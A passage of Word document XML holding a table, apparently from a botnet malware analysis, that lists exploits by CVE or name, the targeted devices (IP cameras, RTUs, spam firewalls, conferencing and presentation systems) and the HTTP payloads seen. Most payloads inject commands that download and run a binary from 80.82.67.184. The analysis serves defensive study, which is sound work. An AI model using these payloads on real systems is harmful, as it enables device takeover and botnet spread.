            <w:r w:rsidRPr="00BB2A52">
              <w:t>richard</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00BB2A52">
              <w:t>; .</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00BB2A52">
              <w:t>/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00BB2A52">
              <w:t>richard</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00BB2A52">
              <w:t xml:space="preserve"> HTTP/1.1</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1C11FECF" w14:textId="25B8724D" w:rsidR="00E62929" w:rsidRDefault="00E62929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929">
              <w:t>GET /</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00E62929">
              <w:t>ccbill</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00E62929">
              <w:t>/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00E62929">
              <w:t>whereami.cgi?g</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00E62929">
              <w:t>=cd /</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00E62929">
              <w:t>tmp</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00E62929">
              <w:t xml:space="preserve">; </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00E62929">
              <w:t>wget</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00E62929">
              <w:t xml:space="preserve"> http://80.82.67.184/richard; curl -O http://80.82.67.184/richard; </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00E62929">
              <w:t>chmod</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00E62929">
              <w:t xml:space="preserve"> +x </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00E62929">
              <w:t>richard</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00E62929">
              <w:t>; .</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00E62929">
              <w:t>/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00E62929">
              <w:t>richard</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00E62929">
              <w:t xml:space="preserve"> HTTP/1.1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2197" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="065B39D3" w14:textId="00E6D157" w:rsidR="005E044F" w:rsidRPr="005E044F" w:rsidRDefault="005E044F" w:rsidP="00E9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CBill</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> Online payment platform</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00972FBC" w14:paraId="2459FF42" w14:textId="74C61A9B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01B763B" w14:textId="3797D83A" w:rsidR="00972FBC" w:rsidRPr="00D20D25" w:rsidRDefault="00972FBC" w:rsidP="00B06445">
            <w:r w:rsidRPr="00D20D25">
              <w:t>CVE_2019_14931</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1129" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3893586D" w14:textId="6FCA8784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5BBE459E" w14:textId="77777777" w:rsidR="00972FBC" w:rsidRDefault="009C6698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98">
              <w:t>GET /</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="009C6698">
              <w:t>action.php</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="009C6698">
              <w:t xml:space="preserve"> HTTP/1.1</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="07B420C6" w14:textId="1F3C47E5" w:rsidR="009C6698" w:rsidRDefault="009C6698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98">
              <w:t>{'host</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="009C6698">
              <w:t>' :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="009C6698">
              <w:t xml:space="preserve"> ';cd /</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="009C6698">
              <w:t>tmp</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="009C6698">
              <w:t xml:space="preserve">; </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="009C6698">
              <w:t>wget</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="009C6698">
              <w:t xml:space="preserve"> http://80.82.67.184/richard; curl -O http://80.82.67.184/richard; </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="009C6698">
              <w:t>chmod</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="009C6698">
              <w:t xml:space="preserve"> +x </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="009C6698">
              <w:t>richard</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="009C6698">
              <w:t>; ./</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="009C6698">
              <w:t>richard&amp;PingCheck</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="009C6698">
              <w:t>=Test'}</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2197" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6EF7AD08" w14:textId="3005EE00" w:rsidR="00972FBC" w:rsidRDefault="00EB670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701">
              <w:t xml:space="preserve">Mitsubishi Electric </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00EB6701">
              <w:t>smartRTU</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00EB6701">
              <w:t xml:space="preserve"> &amp; INEA ME-RTU</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> devices</w:t>
            </w:r>
            <w:r w:rsidR="00C459F2">
              <w:t xml:space="preserve"> v2.2-3.0</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00972FBC" w14:paraId="3EE2E669" w14:textId="2EB60E82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103DF17" w14:textId="51A977EB" w:rsidR="00972FBC" w:rsidRPr="00D20D25" w:rsidRDefault="00972FBC" w:rsidP="00B06445">
            <w:r w:rsidRPr="00D20D25">
              <w:t>CVE_2017_16602</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1129" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6C925962" w14:textId="47BDC55E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57BF13F" w14:textId="17548C81" w:rsidR="00972FBC" w:rsidRDefault="001829C6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C6">
              <w:t>POST /u/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="001829C6">
              <w:t>jsp</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="001829C6">
              <w:t>/tools/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="001829C6">
              <w:t>exec.jsp</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="001829C6">
              <w:t xml:space="preserve"> HTTP/1.1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2197" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="19575BC8" w14:textId="7D51FE88" w:rsidR="00972FBC" w:rsidRDefault="002E196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gain</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> System Enterprise Manager 7.2.730 </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00972FBC" w14:paraId="0D7FC989" w14:textId="4768D73B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21EAAAB" w14:textId="56197CCE" w:rsidR="00972FBC" w:rsidRPr="00D20D25" w:rsidRDefault="00972FBC" w:rsidP="00B06445">
            <w:r w:rsidRPr="00D20D25">
              <w:t>CVE_2006_4000</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1129" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0D8630A6" w14:textId="56498F13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70051191" w14:textId="4800FA99" w:rsidR="00972FBC" w:rsidRDefault="004766DC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6DC">
              <w:t>GET /</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="004766DC">
              <w:t>cgi</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="004766DC">
              <w:t>-bin/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="004766DC">
              <w:t>preview_email.cgi?file</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="004766DC">
              <w:t>=/mail/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="004766DC">
              <w:t>mlog</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="004766DC">
              <w:t>/|cd; /</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="004766DC">
              <w:t>tmp</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="004766DC">
              <w:t xml:space="preserve">; </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="004766DC">
              <w:t>wget</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="004766DC">
              <w:t xml:space="preserve"> http://80.82.67.184/richard; curl -O http://80.82.67.184/richard; </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="004766DC">
              <w:t>chmod</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="004766DC">
              <w:t xml:space="preserve"> +x </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="004766DC">
              <w:t>richard</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="004766DC">
              <w:t>; .</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="004766DC">
              <w:t>/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="004766DC">
              <w:t>richard</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="004766DC">
              <w:t xml:space="preserve"> HTTP/1.1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2197" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1C15C887" w14:textId="15F6B2F5" w:rsidR="00972FBC" w:rsidRDefault="00FD1287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rrucada</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> Spam Firewalls </w:t>
            </w:r>
            <w:r w:rsidRPr="00FD1287">
              <w:t>3.3.01.001</w:t>
            </w:r>
            <w:r>
              <w:t>-3.3.01.053</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00972FBC" w14:paraId="2D671C6F" w14:textId="0ABAB192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1B3F0E" w14:textId="5D752836" w:rsidR="00972FBC" w:rsidRPr="00D20D25" w:rsidRDefault="00972FBC" w:rsidP="00B06445">
            <w:r w:rsidRPr="00D20D25">
              <w:t>ACTi_ASOC2200_RCE</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1129" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4F4EC477" w14:textId="5F02A344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190704AF" w14:textId="77777777" w:rsidR="0092278D" w:rsidRDefault="0092278D" w:rsidP="0092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</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>cgi</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>-bin/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>test?iperf</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>=;cd</w:t>
            </w:r>
            <w:proofErr w:type="gram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 xml:space="preserve">; </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>wget</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> http://80.82.67.184/richard; curl -O http://80.82.67.184/richard;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richard</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>; ./</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>richard</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> HTTP/1.1</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1BD3F4E8" w14:textId="3D4B7C40" w:rsidR="00972FBC" w:rsidRDefault="0092278D" w:rsidP="0092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: %s:80</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2197" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="373AEF4D" w14:textId="7EB2AF78" w:rsidR="00972FBC" w:rsidRDefault="008C1BFA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 </w:t>
            </w:r>
            <w:r w:rsidR="003775FA">
              <w:t xml:space="preserve">video surveillance Cameras </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F165C9" w14:paraId="7241CD35" w14:textId="59286890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118233" w14:textId="692152FB" w:rsidR="00972FBC" w:rsidRPr="00D20D25" w:rsidRDefault="00972FBC" w:rsidP="00B06445">
            <w:r w:rsidRPr="00D20D25">
              <w:t>AVCON6_</w:t>
            </w:r>
            <w:r w:rsidR="004067D8">
              <w:t>RCE</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1129" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="59BC9B38" w14:textId="0AF44EAA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339B9221" w14:textId="362CBEB9" w:rsidR="00972FBC" w:rsidRDefault="00083DD4" w:rsidP="00083DD4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DD4">
              <w:t>POST /login.action?redirect:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{%22cd /</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00083DD4">
              <w:t>tmp</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00083DD4">
              <w:t xml:space="preserve">; </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00083DD4">
              <w:t>wget</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00083DD4">
              <w:t xml:space="preserve"> http://80.82.67.184/richard; curl -O http://80.82.67.184/richard; </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00083DD4">
              <w:t>chmod</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00083DD4">
              <w:t xml:space="preserve"> +x </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00083DD4">
              <w:t>richard</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00083DD4">
              <w:t>; ./richard%22})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get(%27com.opensymphony.x</w:t>
            </w:r>
            <w:r w:rsidRPr="00083DD4">
              <w:lastRenderedPageBreak/>
              <w:t>work2.dispatcher.HttpServletResponse%27),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()} HTTP/1.1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2197" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7E40333A" w14:textId="2F731860" w:rsidR="00972FBC" w:rsidRDefault="00101F39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vcon6 Video Conferencing Systems</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006D75AA" w14:paraId="728E3348" w14:textId="73C33331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F0D4FA" w14:textId="744AD15C" w:rsidR="00972FBC" w:rsidRPr="00D20D25" w:rsidRDefault="00972FBC" w:rsidP="00B06445">
            <w:r w:rsidRPr="00D20D25">
              <w:t>P2P_wificam_</w:t>
            </w:r>
            <w:r w:rsidR="0060444A">
              <w:t>RCE</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1129" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="092756E9" w14:textId="445C3FA8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371122A9" w14:textId="77777777" w:rsidR="00972FBC" w:rsidRDefault="006D75AA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5AA">
              <w:t>GET</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="006D75AA">
              <w:t>/set_ftp.cgi?next_url=ftp.htm&amp;loginuse=%s&amp;loginpas=%s&amp;svr=192.168.1.1&amp;port=21&amp;user=ftp&amp;pwd=$(cd /</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="006D75AA">
              <w:t>tmp</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="006D75AA">
              <w:t xml:space="preserve">; </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="006D75AA">
              <w:t>wget+http</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="006D75AA">
              <w:t>://80.82.67.184/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="006D75AA">
              <w:t>richard</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="006D75AA">
              <w:t>; chmod+777+/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="006D75AA">
              <w:t>tmp</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="006D75AA">
              <w:t>/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="006D75AA">
              <w:t>richard</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="006D75AA">
              <w:t>; /</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="006D75AA">
              <w:t>tmp</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="006D75AA">
              <w:t>/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="006D75AA">
              <w:t>richard+</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="006D75AA">
              <w:t>goahead</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="006D75AA">
              <w:t>)&amp;</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="006D75AA">
              <w:t>dir</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="006D75AA">
              <w:t>=/&amp;mode=</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="006D75AA">
              <w:t>PORT&amp;upload_interval</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="006D75AA">
              <w:t>=0</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="453DE530" w14:textId="40A48601" w:rsidR="0003533D" w:rsidRDefault="0003533D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03533D">
              <w:t>ET /set_ftp.cgi?next_url=ftp.htm&amp;loginuse=%s&amp;loginpas=%s&amp;svr=192.168.1.1&amp;port=21&amp;user=ftp&amp;pwd=passpasspasspasspasspasspasspasspass&amp;dir=/&amp;mode=PORT&amp;upload_interval=0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2197" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="228FE67F" w14:textId="2E111776" w:rsidR="00972FBC" w:rsidRDefault="004F15F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P Wireless IP Cameras</w:t>
            </w:r>
            <w:r w:rsidR="00FF383D">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006D75AA" w14:paraId="3EB8FB24" w14:textId="058A6E2E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EC6DF7F" w14:textId="141276A5" w:rsidR="00972FBC" w:rsidRPr="00D20D25" w:rsidRDefault="003D4110" w:rsidP="00B06445">
            <w:r>
              <w:t>W</w:t>
            </w:r>
            <w:r w:rsidR="00C14AA2">
              <w:t>IPG</w:t>
            </w:r>
            <w:r w:rsidR="00972FBC" w:rsidRPr="00D20D25">
              <w:t>1000_</w:t>
            </w:r>
            <w:r>
              <w:t>RCE</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1129" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7E78C008" w14:textId="2202E155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796BFC3F" w14:textId="62077C84" w:rsidR="00972FBC" w:rsidRDefault="00D03475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475">
              <w:t>POST /</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00D03475">
              <w:t>cgi</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00D03475">
              <w:t>-bin/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00D03475">
              <w:t>rdfs.cgi</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00D03475">
              <w:t xml:space="preserve"> HTTP/1.1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2197" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2AB19E99" w14:textId="00C435EB" w:rsidR="00972FBC" w:rsidRDefault="00D03475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3475">
              <w:t>WePresent</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00D03475">
              <w:t xml:space="preserve"> WiPG-1000 Wireless Presentation systems</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006D75AA" w14:paraId="14AD881C" w14:textId="7B1E1CC9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B371952" w14:textId="5B899AB8" w:rsidR="00972FBC" w:rsidRPr="00D20D25" w:rsidRDefault="00AE5962" w:rsidP="00367D67">
            <w:pPr>
              <w:tabs>
                <w:tab w:val="right" w:pos="2053"/>
              </w:tabs>
            </w:pPr>
            <w:r>
              <w:t>CVE</w:t>
            </w:r>
            <w:r w:rsidR="00972FBC" w:rsidRPr="00D20D25">
              <w:t>_2019_3929</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1129" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7BD317F5" w14:textId="638B306D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16ABA748" w14:textId="510D1656" w:rsidR="00EC78F1" w:rsidRDefault="005C2F1C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F1C">
              <w:t>POST /</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="005C2F1C">
              <w:t>cgi</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="005C2F1C">
              <w:t>-bin/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="005C2F1C">
              <w:t>file_transfer.cgi</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="005C2F1C">
              <w:t xml:space="preserve"> HTTP/1.1</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="310B1F8F" w14:textId="7B30B564" w:rsidR="00EC78F1" w:rsidRDefault="00EC78F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names analyzed in </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>ghidra</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> as non-stripped binary:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6C4B028B" w14:textId="6E192273" w:rsidR="00EC78F1" w:rsidRDefault="00EC78F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ckboxScan</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>blackbox_scanner_kill</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>blackbox_setup_connection</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2197" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4D43369E" w14:textId="320A19FF" w:rsidR="00972FBC" w:rsidRDefault="00264CE7" w:rsidP="00B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CE7">
              <w:t xml:space="preserve">Crestron AM/Barco </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00264CE7">
              <w:t>wePresent</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00264CE7">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00264CE7">
              <w:t>WiPG</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00264CE7">
              <w:t xml:space="preserve">/Extron </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00264CE7">
              <w:t>ShareLink</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00264CE7">
              <w:t>/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00264CE7">
              <w:t>Teq</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00264CE7">
              <w:t xml:space="preserve"> AV IT/SHARP PN-L703WA/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00264CE7">
              <w:t>Optoma</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00264CE7">
              <w:t xml:space="preserve"> WPS-Pro/Blackbox HD WPS/InFocus </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00264CE7">
              <w:t>LiteShow</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> devices</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006D75AA" w14:paraId="5E0A5914" w14:textId="26931EF2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D676E03" w14:textId="7419825E" w:rsidR="002930BC" w:rsidRPr="00D20D25" w:rsidRDefault="00320E63" w:rsidP="00B06445">
            <w:r>
              <w:t>CVE</w:t>
            </w:r>
            <w:r w:rsidR="002930BC" w:rsidRPr="002930BC">
              <w:t>-2017-14135</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1129" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="13F439CA" w14:textId="6DCDA86D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1B59C5EA" w14:textId="01C9FA77" w:rsidR="00972FBC" w:rsidRDefault="00EC78F1" w:rsidP="0097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names analyzed in </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>ghidra</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> as non-stripped binary: </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidR="00974947">
              <w:t>dreamboxscan</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>dreambox_scanner_kill</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
